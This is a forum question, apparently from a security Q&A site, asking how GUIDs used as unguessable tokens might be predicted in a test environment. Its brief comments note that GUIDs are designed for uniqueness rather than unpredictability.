1

I have been using GUIDs as un-guessable tokens in various situations for some time. I came across this question/answer which seems to suggest that while this is ok in some situations, it should not be done where security is a significant concern.

Typically when I am trying to understand a vulnerability, I will create an application on my test environment which reproduces the vulnerability and I can then exploit it to see how it works in the real world.

Can anyone point me to any resources that go over how a GUID that is being used as an un-guessable token could be guessed in a controlled environment?

Community
  • 1
Abe Miessler
  • 8,155
  • 10
  • 44
  • 72
  • This depends on how your application generates GUIDs, doesn't it? As one of the answers in the referenced question states, they were initially conceived to be *unique*, not *unpredictable*. So if you use e.g. last 3 MAC bytes XOR first 3 MAC bytes concatenated with your current system time in millisecs, it can easily be predicted. – Dmitry Janushkevich Jul 10 '14 at 16:55
  • Lets say it's using .NET's built in GUID structure, which I believe uses Version 4? – Abe Miessler Jul 10 '14 at 18:26
  • This may be relevant. http://stackoverflow.com/questions/643445/how-easily-can-you-guess-a-guid-that-might-be-generated – Andrew Hoffman Jul 10 '14 at 18:39

0 Answers0